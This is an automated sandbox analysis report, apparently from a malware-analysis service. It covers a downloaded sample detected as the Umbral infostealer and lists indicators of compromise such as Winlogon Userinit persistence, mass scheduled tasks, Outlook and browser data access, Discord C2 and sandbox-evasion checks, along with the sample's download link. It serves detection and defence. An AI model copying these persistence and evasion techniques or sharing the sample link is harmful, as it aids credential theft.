Analysis
-
max time kernel
870s -
max time network
447s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250128-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250128-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
03-02-2025 15:21
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://gofile.io/d/YHWmpb
Resource
win10ltsc2021-20250128-en
General
-
Target
https://gofile.io/d/YHWmpb
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2372-1414-0x0000015AF7B40000-0x0000015AF7B80000-memory.dmp family_umbral -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Program Files\\xdwdWireshark Host.exe" BootstrapperNew.exe -
Umbral family
-
pid Process 3500 powershell.exe 4316 powershell.exe 1460 powershell.exe 4436 powershell.exe 1476 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 42 1648 msedge.exe -
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Control Panel\International\Geo\Nation BootstrapperNew.exe -
Executes dropped EXE 5 IoCs
pid Process 1684 BootstrapperNew.exe 4260 BootstrapperNew.exe 1888 BootstrapperNew.exe 2372 tyg5edla.pid.exe 4484 xdwdNode.js.exe -
Loads dropped DLL 64 IoCs
pid Process 628 Process not Found 616 Process not Found 1712 Process not Found 5032 WmiApSrv.exe 3812 Process not Found 3324 Process not Found 4028 Process not Found 2868 Process not Found 3264 Process not Found 2612 Process not Found 2624 Process not Found 2372 Process not Found 4752 Process not Found 3500 Process not Found 4904 Process not Found 1920 Process not Found 4512 Process not Found 1420 Process not Found 2948 Process not Found 4116 Process not Found 2920 Process not Found 840 Process not Found 2680 Process not Found 1088 Process not Found 4416 Process not Found 1092 Process not Found 4484 Process not Found 2084 msedge.exe 1124 Process not Found 3588 Process not Found 4784 Process not Found 4528 Process not Found 1660 Process not Found 3588 Process not Found 452 Process not Found 2124 Process not Found 3312 Process not Found 2792 Process not Found 3964 Process not Found 2100 Process not Found 1872 Process not Found 1824 Process not Found 236 Process not Found 2868 timeout.exe 1912 Process not Found 4260 BootstrapperNew.exe 4124 taskmgr.exe 1776 Process not Found 1292 Process not Found 3076 Process not Found 2552 WmiApSrv.exe 1140 Process not Found 3692 Process not Found 4976 Process not Found 1532 Process not Found 3124 Process not Found 1140 Process not Found 5092 Process not Found 4160 Process not Found 4332 Process not Found 4416 Process not Found 5064 Process not Found 1080 Process not Found 4544 Process not Found -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 BootstrapperNew.exe Key opened \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 BootstrapperNew.exe Key opened \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 BootstrapperNew.exe Key opened \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 BootstrapperNew.exe Key opened \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 BootstrapperNew.exe Key opened \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 BootstrapperNew.exe Key opened \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 BootstrapperNew.exe Key opened \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 BootstrapperNew.exe Key opened \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 BootstrapperNew.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 125 discord.com 124 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 75 icanhazip.com 122 ip-api.com -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\xdwdWireshark Host.exe BootstrapperNew.exe File opened for modification C:\Program Files\xdwdWireshark Host.exe BootstrapperNew.exe File opened for modification C:\Program Files\xdwdWireshark Host.exe BootstrapperNew.exe File opened for modification C:\Program Files\xdwdWireshark Host.exe BootstrapperNew.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\xdwd.dll BootstrapperNew.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4332 cmd.exe 3588 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 BootstrapperNew.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier BootstrapperNew.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 BootstrapperNew.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier BootstrapperNew.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 BootstrapperNew.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier BootstrapperNew.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2868 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2272 wmic.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "178" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings msedge.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3588 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5088 schtasks.exe 2028 schtasks.exe 4332 schtasks.exe 4972 schtasks.exe 4392 schtasks.exe 4460 schtasks.exe 1488 schtasks.exe 3104 schtasks.exe 1032 schtasks.exe 3864 schtasks.exe 1776 schtasks.exe 4672 schtasks.exe 188 schtasks.exe 2768 schtasks.exe 5016 schtasks.exe 2992 schtasks.exe 1656 schtasks.exe 1292 schtasks.exe 4640 schtasks.exe 2796 schtasks.exe 2552 schtasks.exe 4256 schtasks.exe 3048 schtasks.exe 1144 schtasks.exe 1604 schtasks.exe 3176 schtasks.exe 4988 schtasks.exe 4160 schtasks.exe 4056 schtasks.exe 4964 schtasks.exe 4460 schtasks.exe 708 schtasks.exe 4460 schtasks.exe 5068 schtasks.exe 720 schtasks.exe 2992 schtasks.exe 2036 schtasks.exe 5040 schtasks.exe 4964 schtasks.exe 2216 schtasks.exe 2868 schtasks.exe 2156 schtasks.exe 3228 schtasks.exe 720 schtasks.exe 3324 schtasks.exe 2548 schtasks.exe 4772 schtasks.exe 1660 schtasks.exe 4928 schtasks.exe 3324 schtasks.exe 2704 schtasks.exe 5012 schtasks.exe 5036 schtasks.exe 4964 schtasks.exe 5000 schtasks.exe 3588 schtasks.exe 3648 schtasks.exe 3020 schtasks.exe 4448 schtasks.exe 2544 schtasks.exe 3252 schtasks.exe 4912 schtasks.exe 1652 schtasks.exe 952 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1648 msedge.exe 1648 msedge.exe 3524 msedge.exe 3524 msedge.exe 1864 identity_helper.exe 1864 identity_helper.exe 4012 msedge.exe 4012 msedge.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 5032 WmiApSrv.exe 5032 WmiApSrv.exe 1684 BootstrapperNew.exe 1684 BootstrapperNew.exe 2084 msedge.exe 2084 msedge.exe 2084 msedge.exe 2084 msedge.exe 2084 msedge.exe 2084 msedge.exe 2868 timeout.exe 2868 timeout.exe 4260 BootstrapperNew.exe 4260 BootstrapperNew.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4124 taskmgr.exe -
Suspicious behavior: LoadsDriver 64 IoCs
pid Process 4488 Process not Found 3048 Process not Found 3692 Process not Found 4420 Process not Found 1912 Process not Found 1740 Process not Found 1104 Process not Found 2980 Process not Found 3008 Process not Found 4688 Process not Found 2468 Process not Found 1852 Process not Found 976 Process not Found 1916 Process not Found 4416 Process not Found 1444 Process not Found 1316 Process not Found 1240 Process not Found 4524 Process not Found 1388 Process not Found 4576 Process not Found 5052 Process not Found 2068 Process not Found 3668 Process not Found 3032 Process not Found 2036 Process not Found 1564 Process not Found 2060 Process not Found 4164 Process not Found 4976 Process not Found 872 Process not Found 3504 Process not Found 4924 Process not Found 4668 Process not Found 4956 Process not Found 704 Process not Found 4732 Process not Found 2964 Process not Found 1716 Process not Found 2244 Process not Found 5020 Process not Found 2800 Process not Found 5060 Process not Found 2696 Process not Found 3392 Process not Found 1440 Process not Found 1784 Process not Found 5108 Process not Found 4400 Process not Found 2480 Process not Found 4380 Process not Found 3768 Process not Found 3112 Process not Found 4284 Process not Found 636 Process not Found 1556 Process not Found 1676 Process not Found 1300 Process not Found 4316 Process not Found 1568 Process not Found 2512 Process not Found 3012 Process not Found 4000 Process not Found 3860 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 25 IoCs
pid Process 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1684 BootstrapperNew.exe Token: SeDebugPrivilege 4260 BootstrapperNew.exe Token: SeDebugPrivilege 4124 taskmgr.exe Token: SeSystemProfilePrivilege 4124 taskmgr.exe Token: SeCreateGlobalPrivilege 4124 taskmgr.exe Token: SeDebugPrivilege 1888 BootstrapperNew.exe Token: SeDebugPrivilege 3500 powershell.exe Token: SeDebugPrivilege 2372 tyg5edla.pid.exe Token: SeDebugPrivilege 4316 powershell.exe Token: SeIncreaseQuotaPrivilege 4316 powershell.exe Token: SeSecurityPrivilege 4316 powershell.exe Token: SeTakeOwnershipPrivilege 4316 powershell.exe Token: SeLoadDriverPrivilege 4316 powershell.exe Token: SeSystemProfilePrivilege 4316 powershell.exe Token: SeSystemtimePrivilege 4316 powershell.exe Token: SeProfSingleProcessPrivilege 4316 powershell.exe Token: SeIncBasePriorityPrivilege 4316 powershell.exe Token: SeCreatePagefilePrivilege 4316 powershell.exe Token: SeBackupPrivilege 4316 powershell.exe Token: SeRestorePrivilege 4316 powershell.exe Token: SeShutdownPrivilege 4316 powershell.exe Token: SeDebugPrivilege 4316 powershell.exe Token: SeSystemEnvironmentPrivilege 4316 powershell.exe Token: SeRemoteShutdownPrivilege 4316 powershell.exe Token: SeUndockPrivilege 4316 powershell.exe Token: SeManageVolumePrivilege 4316 powershell.exe Token: 33 4316 powershell.exe Token: 34 4316 powershell.exe Token: 35 4316 powershell.exe Token: 36 4316 powershell.exe Token: SeDebugPrivilege 1460 powershell.exe Token: SeDebugPrivilege 4436 powershell.exe Token: SeDebugPrivilege 412 powershell.exe Token: SeIncreaseQuotaPrivilege 4884 wmic.exe Token: SeSecurityPrivilege 4884 wmic.exe Token: SeTakeOwnershipPrivilege 4884 wmic.exe Token: SeLoadDriverPrivilege 4884 wmic.exe Token: SeSystemProfilePrivilege 4884 wmic.exe Token: SeSystemtimePrivilege 4884 wmic.exe Token: SeProfSingleProcessPrivilege 4884 wmic.exe Token: SeIncBasePriorityPrivilege 4884 wmic.exe Token: SeCreatePagefilePrivilege 4884 wmic.exe Token: SeBackupPrivilege 4884 wmic.exe Token: SeRestorePrivilege 4884 wmic.exe Token: SeShutdownPrivilege 4884 wmic.exe Token: SeDebugPrivilege 4884 wmic.exe Token: SeSystemEnvironmentPrivilege 4884 wmic.exe Token: SeRemoteShutdownPrivilege 4884 wmic.exe Token: SeUndockPrivilege 4884 wmic.exe Token: SeManageVolumePrivilege 4884 wmic.exe Token: 33 4884 wmic.exe Token: 34 4884 wmic.exe Token: 35 4884 wmic.exe Token: 36 4884 wmic.exe Token: SeIncreaseQuotaPrivilege 4884 wmic.exe Token: SeSecurityPrivilege 4884 wmic.exe Token: SeTakeOwnershipPrivilege 4884 wmic.exe Token: SeLoadDriverPrivilege 4884 wmic.exe Token: SeSystemProfilePrivilege 4884 wmic.exe Token: SeSystemtimePrivilege 4884 wmic.exe Token: SeProfSingleProcessPrivilege 4884 wmic.exe Token: SeIncBasePriorityPrivilege 4884 wmic.exe Token: SeCreatePagefilePrivilege 4884 wmic.exe Token: SeBackupPrivilege 4884 wmic.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 3524 msedge.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe 4124 taskmgr.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 780 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3524 wrote to memory of 1680 3524 msedge.exe 83 PID 3524 wrote to memory of 1680 3524 msedge.exe 83 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 3840 3524 msedge.exe 84 PID 3524 wrote to memory of 1648 3524 msedge.exe 85 PID 3524 wrote to memory of 1648 3524 msedge.exe 85 PID 3524 wrote to memory of 2404 3524 msedge.exe 86 PID 3524 wrote to memory of 2404 3524 msedge.exe 86 PID 3524 wrote to memory of 2404 3524 msedge.exe 86 PID 3524 wrote to memory of 2404 3524 msedge.exe 86 PID 3524 wrote to memory of 2404 3524 msedge.exe 86 PID 3524 wrote to memory of 2404 3524 msedge.exe 86 PID 3524 wrote to memory of 2404 3524 msedge.exe 86 PID 3524 wrote to memory of 2404 3524 msedge.exe 86 PID 3524 wrote to memory of 2404 3524 msedge.exe 86 PID 3524 wrote to memory of 2404 3524 msedge.exe 86 PID 3524 wrote to memory of 2404 3524 msedge.exe 86 PID 3524 wrote to memory of 2404 3524 msedge.exe 86 PID 3524 wrote to memory of 2404 3524 msedge.exe 86 PID 3524 wrote to memory of 2404 3524 msedge.exe 86 PID 3524 wrote to memory of 2404 3524 msedge.exe 86 PID 3524 wrote to memory of 2404 3524 msedge.exe 86 PID 3524 wrote to memory of 2404 3524 msedge.exe 86 PID 3524 wrote to memory of 2404 3524 msedge.exe 86 PID 3524 wrote to memory of 2404 3524 msedge.exe 86 PID 3524 wrote to memory of 2404 3524 msedge.exe 86 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2780 attrib.exe -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 BootstrapperNew.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 BootstrapperNew.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/YHWmpb1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3524 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ff84a9646f8,0x7ff84a964708,0x7ff84a9647182⤵PID:1680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:22⤵PID:3840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:32⤵
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
PID:1648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2788 /prefetch:82⤵PID:2404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:12⤵PID:2820
-
-
